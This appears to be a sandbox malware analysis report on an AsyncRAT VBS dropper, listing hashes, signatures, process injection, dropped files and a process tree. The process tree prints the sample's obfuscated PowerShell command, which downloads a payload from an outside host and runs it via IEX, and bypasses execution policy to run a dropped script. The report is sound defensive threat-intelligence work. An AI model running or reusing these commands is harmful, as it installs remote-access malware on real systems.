asyncrat | adeff8d430d7b1a1e66e8dfe0d82019a850a7f9d6c597e7e304eaff7c27626e8

General

Target

JOJLKD8241.vbs
Size

747B
MD5

428942122b9451d2f4e1b8e0f1ae30c9
SHA1

95510a49b43260e32824409ca4559f31f1b5dc5b
SHA256

adeff8d430d7b1a1e66e8dfe0d82019a850a7f9d6c597e7e304eaff7c27626e8
SHA512

d6a1b3b88f49b55a653d0fb0019290acf22e55ef15d2dfd8baed4d92fcdfceaa9a84c558d6982a95c6196c812abf4ff49f0ba7253610fb5f3b81552d1ee0639c

Score

10^/10

asyncrat rat suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://lawsonplace.com/.final.txt

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1944-196-0x000000000040D08E-mapping.dmp	asyncrat
behavioral2/memory/2164-240-0x000000000040D08E-mapping.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 3140 powershell.exe
20 3140 powershell.exe

flow	pid	process
7	3140	powershell.exe
20	3140	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 2988 set thread context of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 1640 set thread context of 2164	1640	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeIncreaseQuotaPrivilege	3140	powershell.exe
Token: SeSecurityPrivilege	3140	powershell.exe
Token: SeTakeOwnershipPrivilege	3140	powershell.exe
Token: SeLoadDriverPrivilege	3140	powershell.exe
Token: SeSystemProfilePrivilege	3140	powershell.exe
Token: SeSystemtimePrivilege	3140	powershell.exe
Token: SeProfSingleProcessPrivilege	3140	powershell.exe
Token: SeIncBasePriorityPrivilege	3140	powershell.exe
Token: SeCreatePagefilePrivilege	3140	powershell.exe
Token: SeBackupPrivilege	3140	powershell.exe
Token: SeRestorePrivilege	3140	powershell.exe
Token: SeShutdownPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeSystemEnvironmentPrivilege	3140	powershell.exe
Token: SeRemoteShutdownPrivilege	3140	powershell.exe
Token: SeUndockPrivilege	3140	powershell.exe
Token: SeManageVolumePrivilege	3140	powershell.exe
Token: 33	3140	powershell.exe
Token: 34	3140	powershell.exe
Token: 35	3140	powershell.exe
Token: 36	3140	powershell.exe
Token: SeIncreaseQuotaPrivilege	3140	powershell.exe
Token: SeSecurityPrivilege	3140	powershell.exe
Token: SeTakeOwnershipPrivilege	3140	powershell.exe
Token: SeLoadDriverPrivilege	3140	powershell.exe
Token: SeSystemProfilePrivilege	3140	powershell.exe
Token: SeSystemtimePrivilege	3140	powershell.exe
Token: SeProfSingleProcessPrivilege	3140	powershell.exe
Token: SeIncBasePriorityPrivilege	3140	powershell.exe
Token: SeCreatePagefilePrivilege	3140	powershell.exe
Token: SeBackupPrivilege	3140	powershell.exe
Token: SeRestorePrivilege	3140	powershell.exe
Token: SeShutdownPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeSystemEnvironmentPrivilege	3140	powershell.exe
Token: SeRemoteShutdownPrivilege	3140	powershell.exe
Token: SeUndockPrivilege	3140	powershell.exe
Token: SeManageVolumePrivilege	3140	powershell.exe
Token: 33	3140	powershell.exe
Token: 34	3140	powershell.exe
Token: 35	3140	powershell.exe
Token: 36	3140	powershell.exe
Token: SeIncreaseQuotaPrivilege	3140	powershell.exe
Token: SeSecurityPrivilege	3140	powershell.exe
Token: SeTakeOwnershipPrivilege	3140	powershell.exe
Token: SeLoadDriverPrivilege	3140	powershell.exe
Token: SeSystemProfilePrivilege	3140	powershell.exe
Token: SeSystemtimePrivilege	3140	powershell.exe
Token: SeProfSingleProcessPrivilege	3140	powershell.exe
Token: SeIncBasePriorityPrivilege	3140	powershell.exe
Token: SeCreatePagefilePrivilege	3140	powershell.exe
Token: SeBackupPrivilege	3140	powershell.exe
Token: SeRestorePrivilege	3140	powershell.exe
Token: SeShutdownPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeSystemEnvironmentPrivilege	3140	powershell.exe
Token: SeRemoteShutdownPrivilege	3140	powershell.exe
Token: SeUndockPrivilege	3140	powershell.exe
Token: SeManageVolumePrivilege	3140	powershell.exe
Token: 33	3140	powershell.exe
Token: 34	3140	powershell.exe
Token: 35	3140	powershell.exe
Token: 36	3140	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

WScript.exepowershell.exeWScript.exepowershell.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2608 wrote to memory of 3140	2608	WScript.exe	powershell.exe
PID 2608 wrote to memory of 3140	2608	WScript.exe	powershell.exe
PID 3140 wrote to memory of 3888	3140	powershell.exe	WScript.exe
PID 3140 wrote to memory of 3888	3140	powershell.exe	WScript.exe
PID 3888 wrote to memory of 2988	3888	WScript.exe	powershell.exe
PID 3888 wrote to memory of 2988	3888	WScript.exe	powershell.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 2988 wrote to memory of 1944	2988	powershell.exe	aspnet_compiler.exe
PID 4060 wrote to memory of 1640	4060	WScript.exe	powershell.exe
PID 4060 wrote to memory of 1640	4060	WScript.exe	powershell.exe
PID 1640 wrote to memory of 2012	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2012	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2012	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe
PID 1640 wrote to memory of 2164	1640	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JOJLKD8241.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,'https:++++++++++++++++++++++++/.final.txt'.Replace('++++++++++++++++++++++++','//lawsonplace.com'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MsMpLics.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:3888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Public\EppManifest.ps1
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
PID:1944

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\WindowsHost\MsMpLics.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Public\EppManifest.ps1
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:2012

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:2164

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WindowsHost\MsMpLics.vbs
MD5
f88416aac0169542e361f858dcbebd1b

SHA1
1bfaec27a3ff28621f7c6623043fde6a679245b1

SHA256
64fa1d25cbaf04307dea237bc5a7e23a46f88ccd261ceb6541a738b87b8a996c

SHA512
f7f54d5c1fc70b4c24e9778965cfcc647b80551c02af414b5ac3eebbba3936371ecc7c83ba829fea8dcccb247f182d99c55b25a1facd92315752be5a38cfbb30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
5f0b198807cbf23cc1fece5d8d37675b

SHA1
e8d651684243cf0cee9ec99e1dec4fbf4567b2b8

SHA256
524b4481f8783ebf4c58b7d890db6b888a6710c567af2be54af360480b1e4567

SHA512
73a04c3c945b4740750eb59857924b7808443b7c8ac9df6e3b2a3cd11840ed836c1196057c09106b3a9bf5da26fef95a16db410aa62810f7706a0b5f2d8cdfe7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0fbd7eeff4f03b27884e355afddc7e21

SHA1
6ac69846db87d5435e66f0b0e386eae72a0e891d

SHA256
eb1b876ee072519a8dd374566275d26d03da255ebc781bfa1bd1314a27f30359

SHA512
2f8db0b1f70b278e6b999c880cfc818a04527a95139a2476e8269c68f4d5ef016b9bb3b0e03face735474bf17ff824522910b84e6f849323bbb20c3eb8b14c6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0fbd7eeff4f03b27884e355afddc7e21

SHA1
6ac69846db87d5435e66f0b0e386eae72a0e891d

SHA256
eb1b876ee072519a8dd374566275d26d03da255ebc781bfa1bd1314a27f30359

SHA512
2f8db0b1f70b278e6b999c880cfc818a04527a95139a2476e8269c68f4d5ef016b9bb3b0e03face735474bf17ff824522910b84e6f849323bbb20c3eb8b14c6b

Download Submit
C:\Users\Public\EppManifest.ps1
MD5
070c01dbc0ad5e933ae828f8d7820a2e

SHA1
54233631313757f1d29307df149e639bd3c5899b

SHA256
e7caba4f997d79157502f1e8c6ef3882034909b42fb6af3b9ddb10d555579cdc

SHA512
95710f4a38d828c1e722f100abcfd52fd74f5b18051c0d03396859b1ade182df34744c2cf33f1428c44f2a03bdbed1e3a0efe0691f9c3eadaa0a202c7d22bd2e

Download Submit
memory/1640-235-0x000001C9C4803000-0x000001C9C4805000-memory.dmp

Filesize
8KB

Download
memory/1640-234-0x000001C9C4800000-0x000001C9C4802000-memory.dmp

Filesize
8KB

Download
memory/1640-219-0x0000000000000000-mapping.dmp

Download
memory/1640-248-0x000001C9C4806000-0x000001C9C4808000-memory.dmp

Filesize
8KB

Download
memory/1944-207-0x0000000002B10000-0x0000000002B11000-memory.dmp

Filesize
4KB

Download
memory/1944-196-0x000000000040D08E-mapping.dmp

Download
memory/2164-240-0x000000000040D08E-mapping.dmp

Download
memory/2164-249-0x0000000004820000-0x0000000004821000-memory.dmp

Filesize
4KB

Download
memory/2988-178-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/2988-186-0x0000022FF62A0000-0x0000022FF62A2000-memory.dmp

Filesize
8KB

Download
memory/2988-206-0x0000022FF62A6000-0x0000022FF62A8000-memory.dmp

Filesize
8KB

Download
memory/2988-189-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/2988-187-0x0000022FF62A3000-0x0000022FF62A5000-memory.dmp

Filesize
8KB

Download
memory/2988-183-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/2988-182-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/2988-176-0x0000000000000000-mapping.dmp

Download
memory/2988-177-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/2988-180-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/2988-179-0x0000022FF4410000-0x0000022FF4412000-memory.dmp

Filesize
8KB

Download
memory/3140-125-0x0000014609A53000-0x0000014609A55000-memory.dmp

Filesize
8KB

Download
memory/3140-118-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-126-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-185-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-143-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-165-0x0000014609A58000-0x0000014609A5A000-memory.dmp

Filesize
8KB

Download
memory/3140-138-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-115-0x0000000000000000-mapping.dmp

Download
memory/3140-116-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-139-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-145-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-144-0x0000014609A56000-0x0000014609A58000-memory.dmp

Filesize
8KB

Download
memory/3140-123-0x0000014621E80000-0x0000014621E81000-memory.dmp

Filesize
4KB

Download
memory/3140-122-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-121-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-120-0x0000014621CD0000-0x0000014621CD1000-memory.dmp

Filesize
4KB

Download
memory/3140-119-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3140-124-0x0000014609A50000-0x0000014609A52000-memory.dmp

Filesize
8KB

Download
memory/3140-117-0x0000014607D80000-0x0000014607D82000-memory.dmp

Filesize
8KB

Download
memory/3888-170-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads